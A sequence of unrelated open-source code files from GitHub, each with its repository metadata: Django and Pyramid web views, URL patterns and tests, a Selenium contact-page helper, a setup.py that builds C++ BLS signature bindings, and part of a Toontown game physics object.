    try:
        starred_count = importer.try_import_starred_stories()
    except TimeoutError:
        # Too slow for the request cycle: finish the import in a celery task.
        ProcessReaderStarredImport.delay(request.user.pk)
        feed_count = UserSubscription.objects.filter(user=request.user).count()
        logging.user(request, "~FR~SBGoogle Reader starred stories import took too long, found %s feeds, %s stories. Tasking..." % (feed_count, starred_count))
        delayed = True
        code = 2
    feed_count = UserSubscription.objects.filter(user=request.user).count()
    return dict(code=code, delayed=delayed, feed_count=feed_count, starred_count=starred_count)
def import_signup(request):
    """Sign up a new account after an anonymous Google Reader authorization.

    On a valid signup, reattaches the anonymous OAuthToken (found by user,
    cookie uuid, session key, then remote IP) to the new user and logs them in.
    Non-premium users are redirected to the payment form.
    """
    ip = request.META.get('HTTP_X_FORWARDED_FOR', None) or request.META.get('REMOTE_ADDR', "")
    if request.method == "POST":
        signup_form = SignupForm(prefix='signup', data=request.POST)
        if signup_form.is_valid():
            new_user = signup_form.save()
            # Same fallback chain as reader_callback: most specific match first.
            user_token = OAuthToken.objects.filter(user=new_user)
            if not user_token:
                user_uuid = request.COOKIES.get('newsblur_reader_uuid')
                if user_uuid:
                    user_token = OAuthToken.objects.filter(uuid=user_uuid).order_by('-created_date')
            if not user_token:
                if request.session.session_key:
                    user_token = OAuthToken.objects.filter(session_id=request.session.session_key).order_by('-created_date')
            if not user_token:
                user_token = OAuthToken.objects.filter(remote_ip=ip).order_by('-created_date')
            if user_token:
                # Claim the token for the freshly created account.
                user_token = user_token[0]
                user_token.session_id = request.session.session_key
                user_token.user = new_user
                user_token.save()
                login_user(request, new_user)
                if request.user.profile.is_premium:
                    return HttpResponseRedirect(reverse('index'))
                url = "https://%s%s" % (Site.objects.get_current().domain,
                                        reverse('stripe-form'))
                return HttpResponseRedirect(url)
            else:
                logging.user(request, "~BR~FW ***> Can't find user token during import/signup. Re-authenticating...")
                return HttpResponseRedirect(reverse('google-reader-authorize'))
    else:
        signup_form = SignupForm(prefix='signup')
    # Invalid POSTs fall through and re-render the form with errors.
    return render_to_response('import/signup.xhtml', {
        'signup_form': signup_form,
    }, context_instance=RequestContext(request))
|
{
"content_hash": "f5b15aedbe974bddbf8387d4626a4ac4",
"timestamp": "",
"source": "github",
"line_count": 284,
"max_line_length": 163,
"avg_line_length": 42.45422535211268,
"alnum_prop": 0.638550219789334,
"repo_name": "petecummings/NewsBlur",
"id": "054439e1b1729dd59b2812eb76f5493dd5bc522f",
"size": "12057",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "apps/feed_import/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "4431"
},
{
"name": "C++",
"bytes": "2926"
},
{
"name": "CSS",
"bytes": "678472"
},
{
"name": "CoffeeScript",
"bytes": "6451"
},
{
"name": "HTML",
"bytes": "268726"
},
{
"name": "Java",
"bytes": "705714"
},
{
"name": "JavaScript",
"bytes": "1576948"
},
{
"name": "M",
"bytes": "47696"
},
{
"name": "Nginx",
"bytes": "897"
},
{
"name": "Objective-C",
"bytes": "3708787"
},
{
"name": "Perl",
"bytes": "55598"
},
{
"name": "Python",
"bytes": "2406474"
},
{
"name": "R",
"bytes": "527"
},
{
"name": "Ruby",
"bytes": "870"
},
{
"name": "Shell",
"bytes": "40018"
}
],
"symlink_target": ""
}
|
import unittest
from pyramid import testing
class ViewTests(unittest.TestCase):
    """Exercise the Pyramid view callables against a dummy request."""

    def setUp(self):
        # Install a fresh Pyramid testing configuration for every test.
        self.config = testing.setUp()

    def tearDown(self):
        # Remove the configuration installed by setUp().
        testing.tearDown()

    def test_my_view(self):
        from .views import my_view
        dummy_request = testing.DummyRequest()
        info = my_view(dummy_request)
        # self.assertEqual(info['project'], 'angular-tictactoe')
|
{
"content_hash": "21132545466ee52c6eb88107493cfeec",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 64,
"avg_line_length": 23.294117647058822,
"alnum_prop": 0.6439393939393939,
"repo_name": "yqian1991/angular-tictactoe",
"id": "12eee7afab9712bfaf6ed8708cd0511381aa0c54",
"size": "396",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "angulartictactoe/tests.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "3445"
},
{
"name": "Python",
"bytes": "6832"
},
{
"name": "Shell",
"bytes": "60"
}
],
"symlink_target": ""
}
|
from django.shortcuts import render, redirect
from django.core.urlresolvers import reverse
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.contrib.auth import authenticate, login, logout
from django.contrib import messages
from django.utils import timezone
from datetime import timedelta
from coursereg import models
from django.contrib.auth import update_session_auth_hash
from django.core.exceptions import PermissionDenied
from coursereg import utils
@login_required
def index(request):
    """Render the student home page with registrations, notifications and
    currently-open courses.

    Only users of type student may view this page; students without an
    assigned adviser are bounced to the fatal-error page.
    """
    if request.user.user_type != models.User.USER_TYPE_STUDENT:
        raise PermissionDenied
    if not request.user.adviser:
        messages.error(request, 'Adviser not assigned.')
        return redirect('coursereg:fatal')

    participants = models.Participant.objects.filter(
        user=request.user).order_by('-course__term__last_reg_date', 'course__title')
    unread = models.Notification.objects.filter(
        user=request.user, is_student_acknowledged=False).order_by('-created_at')
    notifications = [
        (n.created_at, models.Notification.ORIGIN_CHOICES[n.origin][1], n.message)
        for n in unread
    ]
    # Courses whose registration window is currently open.
    open_courses = models.Course.objects.filter(
        term__last_reg_date__gte=timezone.now(),
        term__start_reg_date__lte=timezone.now())

    context = {
        'user_type': 'student',
        'nav_active': 'home',
        'user_email': request.user.email,
        'reg_types': models.RegistrationType.objects.filter(is_active=True),
        'user_id': request.user.id,
        'participants': participants,
        'notifications': notifications,
        'courses': open_courses,
    }
    return render(request, 'coursereg/student.html', context)
|
{
"content_hash": "cde4c249ab4ce8b8be19a7773d9cf8e5",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 135,
"avg_line_length": 49.03030303030303,
"alnum_prop": 0.715698393077874,
"repo_name": "s-gv/bheemboy",
"id": "803d0d53a0dbfd24918a99f869ebaa30d74af413",
"size": "1618",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "coursereg/views/student.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4279"
},
{
"name": "HTML",
"bytes": "116930"
},
{
"name": "JavaScript",
"bytes": "6144"
},
{
"name": "Python",
"bytes": "167718"
}
],
"symlink_target": ""
}
|
"""Urls for the Zinnia categories"""
from django.conf.urls import url
from django.conf.urls import patterns
from zinnia.urls import _
from zinnia.views.categories import CategoryList
from zinnia.views.categories import CategoryDetail
urlpatterns = patterns(
    '',
    # Index of all categories.
    url(r'^$',
        CategoryList.as_view(),
        name='category_list'),
    # One category's entries, paginated; the pattern is wrapped in _()
    # (imported from zinnia.urls — presumably for i18n of the path, TODO confirm).
    url(_(r'^(?P<path>[-\/\w]+)/page/(?P<page>\d+)/$'),
        CategoryDetail.as_view(),
        name='category_detail_paginated'),
    # One category's entries, first page.
    url(r'^(?P<path>[-\/\w]+)/$',
        CategoryDetail.as_view(),
        name='category_detail'),
)
|
{
"content_hash": "22e0775b7a84e2d7db17497c15fc5176",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 55,
"avg_line_length": 27.761904761904763,
"alnum_prop": 0.6260720411663808,
"repo_name": "ZuluPro/django-blog-zinnia",
"id": "c4624577e23b222f034be2166ef8f4bab3a1c3e0",
"size": "583",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "zinnia/urls/categories.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "77370"
},
{
"name": "HTML",
"bytes": "75068"
},
{
"name": "JavaScript",
"bytes": "235617"
},
{
"name": "Makefile",
"bytes": "1789"
},
{
"name": "Python",
"bytes": "506854"
}
],
"symlink_target": ""
}
|
"""tor_scraper contains simple tools for scraping websites via the Tor network.
"""
# Set default module logging handler to avoid 'No handler found' warnings
import logging
logging.getLogger(__name__).addHandler(logging.NullHandler())
from .tor_scraper import TorScraper
|
{
"content_hash": "73f5f15d5181d23d73127aaad30a4353",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 79,
"avg_line_length": 30.444444444444443,
"alnum_prop": 0.781021897810219,
"repo_name": "peterbrandt84/tor_scraper",
"id": "d0580f2d2f9bfe2f8fdd5e085926da2fe012ec6c",
"size": "960",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "7596"
}
],
"symlink_target": ""
}
|
from __future__ import division, print_function
|
{
"content_hash": "dee0929a7125821ced3e9eec238a91b3",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 47,
"avg_line_length": 48,
"alnum_prop": 0.7708333333333334,
"repo_name": "Erotemic/hotspotter",
"id": "f4319b817d9fa7df772ea493934cbb7bd71c0faa",
"size": "48",
"binary": false,
"copies": "9",
"ref": "refs/heads/jon",
"path": "_setup/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "175"
},
{
"name": "Python",
"bytes": "2017583"
},
{
"name": "Shell",
"bytes": "20855"
}
],
"symlink_target": ""
}
|
from django.conf.urls import url
from api.osf_groups import views
# URL namespace for the OSF groups API.
app_name = 'osf'

urlpatterns = [
    # Collection of groups.
    url(r'^$', views.GroupList.as_view(), name=views.GroupList.view_name),
    # A single group.
    url(r'^(?P<group_id>\w+)/$', views.GroupDetail.as_view(), name=views.GroupDetail.view_name),
    # Members of a group.
    url(r'^(?P<group_id>\w+)/members/$', views.GroupMembersList.as_view(), name=views.GroupMembersList.view_name),
    # A single member of a group.
    url(r'^(?P<group_id>\w+)/members/(?P<user_id>\w+)/$', views.GroupMemberDetail.as_view(), name=views.GroupMemberDetail.view_name),
]
|
{
"content_hash": "e01b1c0ec042e041fe9c6b61cebb33ea",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 133,
"avg_line_length": 43.75,
"alnum_prop": 0.6819047619047619,
"repo_name": "Johnetordoff/osf.io",
"id": "d877198eb1052902d3386ac6708a2b3b777068aa",
"size": "525",
"binary": false,
"copies": "9",
"ref": "refs/heads/develop",
"path": "api/osf_groups/urls.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "93635"
},
{
"name": "Dockerfile",
"bytes": "5876"
},
{
"name": "HTML",
"bytes": "373738"
},
{
"name": "JavaScript",
"bytes": "1596130"
},
{
"name": "Mako",
"bytes": "679193"
},
{
"name": "Python",
"bytes": "11587197"
},
{
"name": "Shell",
"bytes": "2841"
},
{
"name": "VCL",
"bytes": "13885"
}
],
"symlink_target": ""
}
|
__author__ = 'vlovets'
from model.contact import Contact
import re
from selenium.webdriver.support.ui import Select
class ContactHelper:
    """Selenium page-object helper for the address-book contact pages.

    All methods drive the shared WebDriver held by the application fixture
    (``self.app.wd``).
    """

    def __init__(self, app):
        # app: application fixture that owns the WebDriver session.
        self.app = app

    def open_contact_page(self):
        """Open the "add new" contact form unless it is already open."""
        wd = self.app.wd
        if not (wd.current_url.endswith('edit.php') and (len(wd.find_elements_by_name('submit')) > 0)):
            wd.find_element_by_link_text("add new").click()

    def open_home_page(self):
        """Open the contact list ("home") unless it is already shown."""
        wd = self.app.wd
        if not ((len(wd.find_elements_by_id('maintable')) > 0) and (len(wd.find_elements_by_name('add')) > 0)):
            wd.find_element_by_link_text("home").click()

    def change_field_value(self, field_name, text):
        """Overwrite the named form field with text; None leaves it untouched."""
        wd = self.app.wd
        if text is not None:
            wd.find_element_by_name(field_name).click()
            wd.find_element_by_name(field_name).clear()
            wd.find_element_by_name(field_name).send_keys(text)

    def fill_contact_fields(self, contact):
        """Fill every supported field of the contact form from a Contact model."""
        wd = self.app.wd
        self.change_field_value("firstname", contact.firstname)
        self.change_field_value("middlename", contact.middlename)
        self.change_field_value("lastname", contact.lastname)
        self.change_field_value("nickname", contact.nickname)
        self.change_field_value("title", contact.title)
        self.change_field_value("company", contact.company)
        self.change_field_value("address", contact.address)
        self.change_field_value("home", contact.home)
        self.change_field_value("mobile", contact.mobile)
        self.change_field_value("work", contact.work)
        self.change_field_value("fax", contact.fax)
        self.change_field_value("email2", contact.email2)
        self.change_field_value("email", contact.email)
        self.change_field_value("email3", contact.email3)
        self.change_field_value("homepage", contact.homepage)
        self.change_field_value("address2", contact.address2)
        self.change_field_value("phone2", contact.phone2)
        self.change_field_value("notes", contact.notes)

    def select_first_contact(self, index):
        """Tick the checkbox of the first contact row.

        NOTE(review): the index argument is accepted but ignored.
        """
        self.select_contact_by_index(0)

    def select_contact_by_index(self, index):
        """Tick the checkbox of the contact row at the given position."""
        wd = self.app.wd
        wd.find_elements_by_name("selected[]")[index].click()

    def create(self, contact):
        """Create a new contact via the "add new" form."""
        wd = self.app.wd
        self.open_contact_page()
        self.fill_contact_fields(contact)
        # submit creation
        wd.find_element_by_name("submit").click()
        self.contact_cache = None

    def delete_first_contact(self, index):
        """Delete the first contact row.

        NOTE(review): the index argument is accepted but ignored.
        """
        self.delete_contact_by_index(0)

    def delete_contact_by_index(self, index):
        """Delete the contact at the given row, accepting the confirm alert."""
        success = True  # NOTE(review): unused local
        wd = self.app.wd
        self.open_home_page()
        self.select_contact_by_index(index)
        #submit deletion
        wd.find_element_by_xpath("//div[@id='content']/form[@name='MainForm']/div[2]/input").click()
        #ok
        wd.switch_to_alert().accept()
        self.contact_cache = None

    def edit(self, index):
        """Edit a contact.

        NOTE(review): broken as written — modify_some_contact() requires a
        contact argument, so this call raises TypeError; index is also ignored.
        """
        self.modify_some_contact(0)

    def modify_some_contact(self, index, contact):
        """Open the edit form for the row at index and overwrite its fields."""
        wd = self.app.wd
        self.open_home_page()
        wd.find_elements_by_css_selector('img[alt="Edit"]')[index].click()
        self.fill_contact_fields(contact)
        # submit creation
        wd.find_element_by_name("update").click()
        self.contact_cache = None

    def count(self):
        """Return the number of contact rows on the home page."""
        wd = self.app.wd
        self.open_home_page()
        return len(wd.find_elements_by_name("selected[]"))

    # Cached result of get_contact_list(); invalidated by mutating helpers.
    contact_cache = None

    def get_contact_list(self):
        """Return (and cache) Contact models scraped from the home-page table."""
        if self.contact_cache is None:
            wd = self.app.wd
            self.open_home_page()
            self.contact_cache = []
            for element in wd.find_elements_by_css_selector('tr[name=entry]'):
                cells = element.find_elements_by_tag_name('td')
                firstname = cells[2].text #element.find_elements_by_css_selector('td')[1].text
                lastname = cells[1].text #element.find_elements_by_css_selector('td')[2].text
                address = cells[3].text
                all_mails = cells[4].text
                all_phones = cells[5].text #all_phones = cells[5].text.splitlines()
                id = element.find_element_by_name('selected[]').get_attribute('value') #id = cells[0].find_element_by_tag_name('input').get_attribute('value')
                self.contact_cache.append(Contact(firstname=firstname, lastname=lastname,
                                                  address=address, all_mails=all_mails,
                                                  all_phones_from_homepge=all_phones, id=id))
        return list(self.contact_cache)

    def open_contact_to_edit_by_index(self, index):
        """Open the edit form for the contact at the given row."""
        wd = self.app.wd
        self.open_home_page()
        wd.find_elements_by_css_selector('img[alt="Edit"]')[index].click()

    def open_contact_view_by_index(self, index):
        """Open the read-only details view for the contact at the given row."""
        wd = self.app.wd
        self.open_home_page()
        wd.find_elements_by_css_selector('img[alt="Details"]')[index].click()

    def get_contact_info_from_edit_page(self, index):
        """Scrape a Contact from the edit form of the row at index."""
        wd = self.app.wd
        self.open_contact_to_edit_by_index(index)
        firstname = wd.find_element_by_name("firstname").get_attribute('value')
        lastname = wd.find_element_by_name('lastname').get_attribute('value')
        address = wd.find_element_by_name('address').get_attribute('value')
        id = wd.find_element_by_name('id').get_attribute('value')
        email = wd.find_element_by_name('email').get_attribute('value')
        email2 = wd.find_element_by_name('email2').get_attribute('value')
        email3 = wd.find_element_by_name('email3').get_attribute('value')
        home = wd.find_element_by_name('home').get_attribute('value')
        mobile = wd.find_element_by_name('mobile').get_attribute('value')
        work = wd.find_element_by_name('work').get_attribute('value')
        phone2 = wd.find_element_by_name('phone2').get_attribute('value')
        return Contact(firstname=firstname, lastname=lastname, address=address,
                       id=id, email=email,
                       email2=email2, email3=email3,
                       home=home, mobile=mobile,
                       work=work, phone2=phone2)

    def get_contact_from_view_page(self, index):
        """Scrape the phone numbers shown on the details view into a Contact."""
        wd = self.app.wd
        self.open_contact_view_by_index(index)
        text = wd.find_element_by_id('content').text
        # The view page renders phones as "H: ...", "M: ...", "W: ...", "P: ...".
        home = re.search('H: (.*)', text).group(1)
        mobile = re.search('M: (.*)', text).group(1)
        work = re.search('W: (.*)', text).group(1)
        phone2 = re.search('P: (.*)', text).group(1)
        return Contact(home=home, mobile=mobile,
                       work=work, phone2=phone2)

    def select_contact_by_id(self, id):
        """Tick the row with the given id, then click the MainForm button.

        NOTE(review): despite the name, the second click starts a deletion —
        confirm against callers.
        """
        wd = self.app.wd
        wd.find_element_by_css_selector("input[value='%s']" % id).click()
        wd.find_element_by_xpath("//div[@id='content']/form[@name='MainForm']/div[2]/input").click()

    def select_contact_by_id_for_group(self, id):
        """Tick the row with the given id (no further action)."""
        wd = self.app.wd
        wd.find_element_by_css_selector("input[value='%s']" % id).click()

    def delete_contact_by_id(self, id):
        """Delete the contact with the given id, accepting the confirm alert."""
        success = True  # NOTE(review): unused local
        wd = self.app.wd
        self.open_home_page()
        self.select_contact_by_id(id)
        wd.switch_to_alert().accept()
        self.contact_cache = None

    def click_add_to_group(self):
        """Press the "add" (add-to-group) button on the home page."""
        wd = self.app.wd
        wd.find_element_by_name("add").click()

    def select_second_group(self):
        """Pick the third <option> in the right-hand group selector."""
        wd = self.app.wd
        self.open_home_page()
        wd.find_element_by_xpath("//div[@class='right']/select//option[3]").click()

    def display_contact_in_group(self, group_name):
        """Filter the contact list by the group with the given visible name."""
        wd = self.app.wd
        self.open_home_page()
        #wd.find_element_by_xpath("//form[@id='right']/select//option[5]").click()
        element = wd.find_element_by_name('group')
        select = Select(element)
        select.select_by_visible_text(group_name)

    def remove_from_group(self):
        """Press the "remove" (remove-from-group) button."""
        wd = self.app.wd
        wd.find_element_by_name("remove").click()
|
{
"content_hash": "34cac67d6cf6fd8f57f85a15ce94bd88",
"timestamp": "",
"source": "github",
"line_count": 194,
"max_line_length": 158,
"avg_line_length": 41.597938144329895,
"alnum_prop": 0.5985130111524164,
"repo_name": "VLovets/python_01",
"id": "d2f0e6b2f51bfbfaa513e83360afbf28c226b9a9",
"size": "8070",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "fixture/contact.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "40150"
}
],
"symlink_target": ""
}
|
import os
import platform
import re
import subprocess
import sys
from distutils.version import LooseVersion
from setuptools import Extension, setup, setuptools
from setuptools.command.build_ext import build_ext
class CMakeExtension(Extension):
    """An Extension placeholder whose real build is performed by CMake."""

    def __init__(self, name, sourcedir=""):
        # The sources list is a dummy; CMake discovers the real sources.
        super().__init__(name, sources=["./"])
        self.sourcedir = os.path.abspath(sourcedir)
class CMakeBuild(build_ext):
    """build_ext command that drives CMake instead of invoking a compiler directly."""

    def run(self):
        # Fail early with a clear message if cmake is not on PATH.
        try:
            out = subprocess.check_output(["cmake", "--version"])
        except OSError:
            raise RuntimeError(
                "CMake must be installed to build"
                + " the following extensions: "
                + ", ".join(e.name for e in self.extensions)
            )
        if platform.system() == "Windows":
            cmake_version = LooseVersion(
                re.search(r"version\s*([\d.]+)", out.decode()).group(1)
            )
            if cmake_version < "3.1.0":
                raise RuntimeError("CMake >= 3.1.0 is required on Windows")
        for ext in self.extensions:
            self.build_extension(ext)

    def build_extension(self, ext):
        # Drop the built library next to where setuptools expects the module.
        extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))
        cmake_args = [
            "-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=" + extdir,
            "-DPYTHON_EXECUTABLE=" + sys.executable,
        ]
        cfg = "Debug" if self.debug else "Release"
        build_args = ["--config", cfg]
        if platform.system() == "Windows":
            # Multi-config generators ignore the plain output dir; set the
            # per-config variant too.
            cmake_args += [
                "-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}".format(cfg.upper(), extdir)
            ]
            if sys.maxsize > 2 ** 32:
                # 64-bit Python: target the x64 generator platform.
                cmake_args += ["-A", "x64"]
            build_args += ["--", "/m"]
        else:
            cmake_args += ["-DCMAKE_BUILD_TYPE=" + cfg]
            build_args += ["--", "-j", "6"]
        env = os.environ.copy()
        # Embed the package version into the compiled module.
        env["CXXFLAGS"] = '{} -DVERSION_INFO=\\"{}\\"'.format(
            env.get("CXXFLAGS", ""), self.distribution.get_version()
        )
        if not os.path.exists(self.build_temp):
            os.makedirs(self.build_temp)
        subprocess.check_call(
            ["cmake", ext.sourcedir] + cmake_args, cwd=self.build_temp, env=env
        )
        subprocess.check_call(
            ["cmake", "--build", "."] + build_args, cwd=self.build_temp
        )
class get_pybind_include(object):
    """Lazy proxy for the pybind11 include path.

    Importing pybind11 is deferred until __str__ is evaluated, so that
    setup_requires has a chance to install it before the path is needed.
    """

    def __init__(self, user=False):
        # When true, report the per-user site include directory instead.
        self.user = user

    def __str__(self):
        import pybind11

        return pybind11.get_include(self.user)
# Extension built directly by setuptools against prebuilt static libraries
# checked into the repo; used only by the Windows branch of setup() below
# (other platforms build through CMakeExtension instead).
ext_modules = [
    Extension(
        "blspy",
        [
            "src/elements.cpp",
            "src/schemes.cpp",
            "src/privatekey.cpp",
            "src/bls.cpp",
            "python-bindings/pythonbindings.cpp",
        ],
        include_dirs=[
            # Path to pybind11 headers
            get_pybind_include(),
            get_pybind_include(user=True),
            "relic_ietf_64/include",
            "mpir_gc_x64",
            "libsodium/include",
        ],
        library_dirs=[
            "relic_ietf_64",
            "mpir_gc_x64",
            "libsodium/x64/Release/v142/static",
        ],
        libraries=["relic_s", "Advapi32", "mpir", "libsodium"],
        language="c++",
    ),
]
# As of Python 3.6, CCompiler has a `has_flag` method.
# cf http://bugs.python.org/issue26689
def has_flag(compiler, flagname):
    """Return a boolean indicating whether a flag name is supported on
    the specified compiler.
    """
    import tempfile

    # Compile a trivial translation unit with the candidate flag; a
    # CompileError means the compiler rejected the flag.
    with tempfile.NamedTemporaryFile("w", suffix=".cpp") as f:
        f.write("int main (int argc, char **argv) { return 0; }")
        # NOTE(review): f is not flushed before compile() — appears to rely on
        # buffering behavior; confirm on the target platform.
        try:
            compiler.compile([f.name], extra_postargs=[flagname])
        except setuptools.distutils.errors.CompileError:
            return False
    return True
def cpp_flag(compiler):
    """Return the -std=c++[11/14/17] compiler flag.

    The newest supported standard is preferred over c++11.
    """
    for candidate in ("-std=c++17", "-std=c++14", "-std=c++11"):
        if has_flag(compiler, candidate):
            return candidate
    raise RuntimeError("Unsupported compiler -- at least C++11 support is needed!")
class BuildExt(build_ext):
    """A custom build extension for adding compiler-specific options."""

    # Base compile options per compiler family.
    c_opts = {
        "msvc": ["/EHsc", "/std:c++17", "/DBLSALLOC_SODIUM=1", "/DSODIUM_STATIC"],
        "unix": [],
    }
    # Base link options per compiler family.
    l_opts = {
        "msvc": [],
        "unix": [],
    }

    if sys.platform == "darwin":
        # macOS needs libc++ and an explicit minimum deployment target.
        darwin_opts = ["-stdlib=libc++", "-mmacosx-version-min=10.14"]
        c_opts["unix"] += darwin_opts
        l_opts["unix"] += darwin_opts

    def build_extensions(self):
        ct = self.compiler.compiler_type
        opts = self.c_opts.get(ct, [])
        link_opts = self.l_opts.get(ct, [])
        if ct == "unix":
            opts.append('-DVERSION_INFO="%s"' % self.distribution.get_version())
            # Pick the newest -std=c++NN flag this compiler supports.
            opts.append(cpp_flag(self.compiler))
            if has_flag(self.compiler, "-fvisibility=hidden"):
                opts.append("-fvisibility=hidden")
        elif ct == "msvc":
            # Quoting of the version define differs across Python versions.
            if sys.version_info < (3, 9):
                ver_flag = '/DVERSION_INFO=\\"%s\\"'
            else:
                ver_flag = '-DVERSION_INFO="%s"'
            opts.append(ver_flag % self.distribution.get_version())
        for ext in self.extensions:
            ext.extra_compile_args = opts
            ext.extra_link_args = link_opts
        build_ext.build_extensions(self)
if platform.system() == "Windows":
setup(
name="blspy",
author="Mariano Sorgente",
author_email="mariano@chia.net",
description="BLS signatures in c++ (with python bindings)",
long_description=open("README.md").read(),
long_description_content_type="text/markdown",
url="https://github.com/Chia-Network/bls-signatures",
python_requires=">=3.7",
setup_requires=["pybind11>=2.5.0"],
install_requires=["pybind11>=2.5.0"],
ext_modules=ext_modules,
cmdclass={"build_ext": BuildExt},
zip_safe=False,
)
else:
setup(
name="blspy",
author="Mariano Sorgente",
author_email="mariano@chia.net",
description="BLS signatures in c++ (python bindings)",
python_requires=">=3.7",
install_requires=["wheel"],
long_description=open("README.md").read(),
long_description_content_type="text/markdown",
url="https://github.com/Chia-Network/bls-signatures",
ext_modules=[CMakeExtension("blspy", ".")],
cmdclass=dict(build_ext=CMakeBuild),
zip_safe=False,
)
|
{
"content_hash": "4a9aa13a39f2ec8f65615b9428927287",
"timestamp": "",
"source": "github",
"line_count": 218,
"max_line_length": 86,
"avg_line_length": 31.81651376146789,
"alnum_prop": 0.5537773933102653,
"repo_name": "Darknet-Crypto/Darknet",
"id": "1b0d7b2b13b591cc7ce31134473b5615af91ba5c",
"size": "6955",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/chiabls/setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "7639"
},
{
"name": "C",
"bytes": "989197"
},
{
"name": "C++",
"bytes": "4389178"
},
{
"name": "CSS",
"bytes": "147645"
},
{
"name": "Groff",
"bytes": "18020"
},
{
"name": "HTML",
"bytes": "53221"
},
{
"name": "Java",
"bytes": "2100"
},
{
"name": "M4",
"bytes": "144432"
},
{
"name": "Makefile",
"bytes": "95444"
},
{
"name": "Objective-C",
"bytes": "4147"
},
{
"name": "Objective-C++",
"bytes": "7285"
},
{
"name": "Protocol Buffer",
"bytes": "2308"
},
{
"name": "Python",
"bytes": "211616"
},
{
"name": "QMake",
"bytes": "26302"
},
{
"name": "Shell",
"bytes": "45341"
}
],
"symlink_target": ""
}
|
from pandac.PandaModules import *
from direct.interval.IntervalGlobal import *
from direct.directnotify import DirectNotifyGlobal
from direct.distributed import DistributedSmoothNode
from toontown.toonbase import ToontownGlobals
from otp.otpbase import OTPGlobals
from direct.fsm import FSM
from direct.task import Task
smileyDoId = 1
class DistributedCashbotBossObject(DistributedSmoothNode.DistributedSmoothNode, FSM.FSM):
notify = DirectNotifyGlobal.directNotify.newCategory('DistributedCashbotBossObject')
wantsWatchDrift = 1
def __init__(self, cr):
    """Set up smoothing, FSM state, collision solids and sound intervals.

    cr: the client repository this distributed object belongs to.
    """
    DistributedSmoothNode.DistributedSmoothNode.__init__(self, cr)
    FSM.FSM.__init__(self, 'DistributedCashbotBossObject')
    self.boss = None
    self.avId = 0       # avatar id associated with the current state
    self.craneId = 0    # doId of the crane holding the object (0 when none)
    self.cleanedUp = 0
    # Collide *into* pies/walls/boss objects/camera; collide *from* pies/floors.
    self.collisionNode = CollisionNode('object')
    self.collisionNode.setIntoCollideMask(ToontownGlobals.PieBitmask | OTPGlobals.WallBitmask | ToontownGlobals.CashbotBossObjectBitmask | OTPGlobals.CameraBitmask)
    self.collisionNode.setFromCollideMask(ToontownGlobals.PieBitmask | OTPGlobals.FloorBitmask)
    self.collisionNodePath = NodePath(self.collisionNode)
    self.physicsActivated = 0
    # Empty Sequences act as no-op placeholders; presumably replaced with
    # real sound intervals elsewhere — TODO confirm.
    self.toMagnetSoundInterval = Sequence()
    self.hitFloorSoundInterval = Sequence()
    self.hitBossSfx = loader.loadSfx('phase_5/audio/sfx/AA_drop_safe_miss.ogg')
    self.hitBossSoundInterval = SoundInterval(self.hitBossSfx)
    self.touchedBossSfx = loader.loadSfx('phase_5/audio/sfx/AA_drop_sandbag.ogg')
    self.touchedBossSoundInterval = SoundInterval(self.touchedBossSfx, duration=0.8)
    self.lerpInterval = None
    return
def disable(self):
    """Clean up and stop position smoothing when the object leaves the client."""
    self.cleanup()
    self.stopSmooth()
    DistributedSmoothNode.DistributedSmoothNode.disable(self)
def cleanup(self):
    """Tear down FSM state and sound intervals; safe to call more than once."""
    if self.cleanedUp:
        return
    else:
        self.cleanedUp = 1
    self.demand('Off')
    self.detachNode()
    # Finish and release all sound intervals.
    self.toMagnetSoundInterval.finish()
    self.hitFloorSoundInterval.finish()
    self.hitBossSoundInterval.finish()
    self.touchedBossSoundInterval.finish()
    del self.toMagnetSoundInterval
    del self.hitFloorSoundInterval
    del self.hitBossSoundInterval
    del self.touchedBossSoundInterval
    self.boss = None
    return
def setupPhysics(self, name):
    """Wrap this node in an ActorNode so the physics engine can move it."""
    an = ActorNode('%s-%s' % (name, self.doId))
    anp = NodePath(an)
    if not self.isEmpty():
        self.reparentTo(anp)
    # Re-point this NodePath at the new physics root.
    NodePath.assign(self, anp)
    self.physicsObject = an.getPhysicsObject()
    # Tag so collision entries can be mapped back to this distributed object.
    self.setTag('object', str(self.doId))
    self.collisionNodePath.reparentTo(self)
    self.handler = PhysicsCollisionHandler()
    self.handler.addCollider(self.collisionNodePath, self)
    # Unique event name prefix for this object's collision events.
    self.collideName = self.uniqueName('collide')
    self.handler.addInPattern(self.collideName + '-%in')
    self.handler.addAgainPattern(self.collideName + '-%in')
    self.watchDriftName = self.uniqueName('watchDrift')
def activatePhysics(self):
    """Attach to the physics manager and start listening for collision events."""
    if not self.physicsActivated:
        self.boss.physicsMgr.attachPhysicalNode(self.node())
        base.cTrav.addCollider(self.collisionNodePath, self.handler)
        self.physicsActivated = 1
        self.accept(self.collideName + '-floor', self.__hitFloor)
